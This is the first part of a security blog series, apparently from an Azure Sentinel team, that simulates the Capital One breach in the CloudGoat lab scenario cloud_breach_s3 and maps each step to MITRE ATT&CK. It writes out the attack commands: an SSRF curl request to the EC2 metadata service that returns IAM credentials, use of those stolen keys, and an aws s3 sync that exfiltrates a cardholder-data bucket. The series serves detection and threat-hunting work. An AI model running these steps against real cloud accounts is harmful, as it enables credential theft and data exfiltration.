In July 2019, Capital One suffered one of the biggest data breaches, affecting more than 100 million customer accounts and credit card applications. Based on the criminal complaint charging the accused hacker and several technical analysis blogs published post-breach, the attack involved exploiting a Server-Side Request Forgery (SSRF) flaw in a web application to obtain Amazon Web Services (AWS) access keys for a highly permissive (S3FullAccess) Identity and Access Management (IAM) role, using that role to access sensitive files in S3 storage buckets, and later exfiltrating the sensitive data to attacker-controlled local storage.

This is the first part of a two-part article. In this part, we perform an attack simulation of the Capital One breach scenario using the CloudGoat scenario cloud_breach_s3, developed by Rhino Security Labs. In the second part, we will analyze the logs generated from the simulation and see how to hunt for some of the attacker techniques using AWS data sources onboarded to Azure Sentinel. We will also walk through how to ingest the relevant data sources, develop detection and hunting queries using Kusto Query Language (KQL), and use Azure Sentinel's incident workflow and investigation features. If you want to check the related detections before we publish the second part, you can refer to the Azure Sentinel pull request containing the Logstash config file, the AWSS3Logparser, and the hunting queries.
Based on the available information about the attack, let's start by extracting the Tactics, Techniques and Procedures (TTPs) used by the attacker and mapping them to the MITRE ATT&CK framework, which recently expanded to include cloud techniques. In the table below, we have mapped the attacker techniques and the relevant data sources to these tactics and techniques.
Figure 1 - Attack activity mapped to ATT&CK tactics and techniques
For the attack simulation, we will use the CloudGoat scenario cloud_breach_s3. According to the scenario's summary page, the attacker starts as an anonymous outsider with no access or privileges. They exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys, then use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.
You can follow the quick start guide in the CloudGoat GitHub repository to set up your environment, or directly use the Docker image with a pre-configured environment. We have chosen the Docker image.
Step-1 Run the CloudGoat Docker image
Running the command below drops you into a bash shell with the environment and all prerequisites set up. On first execution, it downloads the Docker image locally.
$docker run -it rhinosecuritylabs/cloudgoat:latest
Step-2 Create the AWS config and credentials to be used by CloudGoat
These are the credentials CloudGoat will use to create and deploy the scenario.
Go to the IAM Console and select Users and then Add user.
Enter the user name and select Programmatic access as the AWS access type, since these credentials will be used via the AWS CLI.
On the next page, select Attach existing policies directly and select the AdministratorAccess policy.
On the last page, you can either download the .csv with the credentials and copy-paste them into the files in the Docker image's home directory under the .aws folder, or simply execute aws configure --profile cloudgoat as shown below to enter the credentials manually.
You can issue the following command in the docker image and enter values retrieved from previous steps:
bash-5.0# aws configure --profile cloudgoat
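The command prompts for the access key ID, secret access key, default region, and output format. Afterwards, the two files should look roughly like the sketch below. The key values are AWS's documented placeholder examples and the region is an assumption, not values from this article:

```ini
# ~/.aws/config
[profile cloudgoat]
region = us-east-1
output = json

# ~/.aws/credentials
[cloudgoat]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
```

Note that the config file prefixes the section name with `profile`, while the credentials file does not.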
In the next step, configure the whitelist so the vulnerable instance is only accessible from the host you are deploying from. You can also add the attacker host from which you plan to execute the scenario cheat-sheet commands.
bash-5.0# ./cloudgoat.py config whitelist
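The whitelist command stores the allowed addresses, one CIDR per line, in a whitelist.txt file in the CloudGoat directory (you can also pass --auto to let CloudGoat detect your current public IP). A sketch with a placeholder address:

```
# whitelist.txt (placeholder address, not from this article)
203.0.113.25/32
```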
Finally, verify that the config and credentials files are correctly populated and present in the home directory under the .aws folder, as shown below.
Step-3 Create and deploy the scenario cloud_breach_s3
bash-5.0# ./cloudgoat.py create cloud_breach_s3 --profile cloudgoat
This command creates one Virtual Private Cloud (VPC) with two resources: an EC2 instance and an S3 bucket.
At successful completion, the output should appear similar to below:
We mimic the attacker operating from IP 18.104.22.168 and issue the cloud_breach_s3 scenario cheat-sheet commands against the vulnerable resources created by the scenario.
Once completed, our setup looks like the diagram below.
The attacker uses curl to send a request to the web server, setting the Host header to the IP address of the EC2 metadata service, 169.254.169.254.
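The cheat-sheet request looks roughly like the sketch below; <ec2-public-ip> is a placeholder for the EC2 instance's address from the cloudgoat output, not a value given in this article:

```shell
# SSRF through the misconfigured reverse proxy: the proxy forwards the request
# to whatever host is named in the Host header - here, the metadata service.
curl -s http://<ec2-public-ip>/latest/meta-data/iam/security-credentials/ \
  -H 'Host: 169.254.169.254'
# The response names the instance-profile role; requesting
# .../security-credentials/<role-name> the same way returns the credentials JSON.
```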
Once the command succeeds, it returns the Access Key ID, Secret Access Key, and Session Token of the IAM instance profile attached to the EC2 instance.
Once the IAM role's credentials are retrieved, the attacker can set up a CLI profile to assume the IAM role, which has full access to S3.
$aws configure --profile erratic
Edit the credentials file and enter the aws_session_token, which is the <Token> value retrieved from the output of the curl request. We did this via the echo command, which appends the details to the existing credentials file as shown below.
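As a sketch with placeholder values (the file path and keys are illustrative, not the real stolen credentials), the append step looks like this:

```shell
# Demo credentials file standing in for ~/.aws/credentials
creds=./credentials.demo
# Profile written earlier by 'aws configure --profile erratic' (placeholder keys)
printf '[erratic]\naws_access_key_id = ASIAEXAMPLE\naws_secret_access_key = EXAMPLESECRET\n' > "$creds"
# Append the session token taken from the metadata service response
echo 'aws_session_token = EXAMPLETOKEN' >> "$creds"
cat "$creds"
```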
With the IAM role credentials set as a CLI profile, the attacker can then list all the buckets and identify, or even access, the private S3 bucket.
$aws s3 ls --profile erratic
Once the private S3 bucket name has been identified, the attacker can enumerate and download the sensitive files to their local machine.
$aws s3 sync s3://cg-cardholder-data-bucket-cgidbqva8iyktl . --profile erratic
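Before (or instead of) syncing everything, the attacker could also list the bucket contents recursively with the same profile; since this requires the stolen credentials, it is shown only as a sketch:

```shell
# Recursively enumerate the bucket's objects using the assumed role's profile
aws s3 ls s3://cg-cardholder-data-bucket-cgidbqva8iyktl --recursive --profile erratic
```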
This concludes our attack simulation and the first part of the series. We will publish the second part on 20th Nov, covering the onboarding of relevant data sources to Azure Sentinel, the log ingestion pipeline, and threat hunting on the logs generated from this attack simulation.